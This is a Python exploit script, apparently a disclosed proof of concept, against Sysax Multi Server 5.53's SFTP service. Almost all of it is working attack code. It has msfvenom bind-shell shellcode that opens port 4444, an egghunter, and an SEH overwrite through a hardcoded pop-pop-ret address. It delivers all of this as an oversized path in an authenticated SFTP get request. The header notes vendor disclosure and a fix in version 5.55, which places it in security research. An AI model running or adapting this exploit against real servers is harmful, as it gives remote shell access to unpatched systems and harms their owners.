#!/usr/bin/python
##########################################################################################################
#Title: Sysax Multi Server 5.53 SFTP Post Auth SEH Exploit (Egghunter)
#Author: Craig Freyman (@cd1zz)
#Tested on: XP SP3 32bit 
#Software Versions Tested: 5.53
#Date Discovered: Febrary 22, 2012
#Vendor Contacted: Febrary 23, 2012
#Vendor Response: February 27, 2012
#Vendor Fix: Version 5.55
#Notes: Offset based on home path length. This exploit works for C:\AAAAAAAAAAAAAAAA
#Complete Description: http://www.pwnag3.com/2012/02/sysax-multi-server-553-sftp-exploit.html
##########################################################################################################
import paramiko,os,sys

if len(sys.argv) != 5:
    print "[+] Usage: ./filename <Target IP> <Port> <User> <Password>"
    sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])
username = sys.argv[3]
password = sys.argv[4]

transport = paramiko.Transport((host, port))
transport.connect(username = username, password = password)
sftp = paramiko.SFTPClient.from_transport(transport)

# msfvenom -p windows/shell_bind_tcp LPORT=4444 -b "\x00" -e x86/shikata_ga_nai
shell = ("DNWPDNWP"
"\xdb\xd9\xba\xf9\x77\x28\x1b\xd9\x74\x24\xf4\x5e\x29\xc9"
"\xb1\x56\x31\x56\x18\x83\xee\xfc\x03\x56\xed\x95\xdd\xe7"
"\xe5\xd3\x1e\x18\xf5\x83\x97\xfd\xc4\x91\xcc\x76\x74\x26"
"\x86\xdb\x74\xcd\xca\xcf\x0f\xa3\xc2\xe0\xb8\x0e\x35\xce"
"\x39\xbf\xf9\x9c\xf9\xa1\x85\xde\x2d\x02\xb7\x10\x20\x43"
"\xf0\x4d\xca\x11\xa9\x1a\x78\x86\xde\x5f\x40\xa7\x30\xd4"
"\xf8\xdf\x35\x2b\x8c\x55\x37\x7c\x3c\xe1\x7f\x64\x37\xad"
"\x5f\x95\x94\xad\x9c\xdc\x91\x06\x56\xdf\x73\x57\x97\xd1"
"\xbb\x34\xa6\xdd\x36\x44\xee\xda\xa8\x33\x04\x19\x55\x44"
"\xdf\x63\x81\xc1\xc2\xc4\x42\x71\x27\xf4\x87\xe4\xac\xfa"
"\x6c\x62\xea\x1e\x73\xa7\x80\x1b\xf8\x46\x47\xaa\xba\x6c"
"\x43\xf6\x19\x0c\xd2\x52\xcc\x31\x04\x3a\xb1\x97\x4e\xa9"
"\xa6\xae\x0c\xa6\x0b\x9d\xae\x36\x03\x96\xdd\x04\x8c\x0c"
"\x4a\x25\x45\x8b\x8d\x4a\x7c\x6b\x01\xb5\x7e\x8c\x0b\x72"
"\x2a\xdc\x23\x53\x52\xb7\xb3\x5c\x87\x18\xe4\xf2\x77\xd9"
"\x54\xb3\x27\xb1\xbe\x3c\x18\xa1\xc0\x96\x2f\xe5\x0e\xc2"
"\x7c\x82\x72\xf4\x93\x0e\xfa\x12\xf9\xbe\xaa\x8d\x95\x7c"
"\x89\x05\x02\x7e\xfb\x39\x9b\xe8\xb3\x57\x1b\x16\x44\x72"
"\x08\xbb\xec\x15\xda\xd7\x28\x07\xdd\xfd\x18\x4e\xe6\x96"
"\xd3\x3e\xa5\x07\xe3\x6a\x5d\xab\x76\xf1\x9d\xa2\x6a\xae"
"\xca\xe3\x5d\xa7\x9e\x19\xc7\x11\xbc\xe3\x91\x5a\x04\x38"
"\x62\x64\x85\xcd\xde\x42\x95\x0b\xde\xce\xc1\xc3\x89\x98"
"\xbf\xa5\x63\x6b\x69\x7c\xdf\x25\xfd\xf9\x13\xf6\x7b\x06"
"\x7e\x80\x63\xb7\xd7\xd5\x9c\x78\xb0\xd1\xe5\x64\x20\x1d"
"\x3c\x2d\x50\x54\x1c\x04\xf9\x31\xf5\x14\x64\xc2\x20\x5a"
"\x91\x41\xc0\x23\x66\x59\xa1\x26\x22\xdd\x5a\x5b\x3b\x88"
"\x5c\xc8\x3c\x99")

egghunter = (
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd"
"\x2e\x3c\x05\x5a\x74\xef\xb8\x44\x4e\x57\x50"
"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

nseh = "\x90\x90\xeb\x08"
junk = "A" * 256
padding = "B" * (256 -len(junk) - len(shell))
seh = "\xA1\x47\x92\x5D" #5D9247A1 PPR RPCNS4.dll: *** SafeSEH unprotected ***
remotepath = junk + nseh + seh + "\x90" * 10 + egghunter + "\x90" * 1000 + shell + "\x90" * 100
localpath = '/tmp/system.log'
print "============================================================================"
print "        Sysax Multi Server <= 5.53 SFTP Post Auth SEH Exploit (Egghunter)   "
print "                                  by cd1zz                                  "
print "                               www.pwnag3.com                               "
print "        Launching exploit against " + host + " on port " + str(port) + " for XP"
print "============================================================================"
sftp.get(remotepath, localpath)
sftp.close()
transport.close()
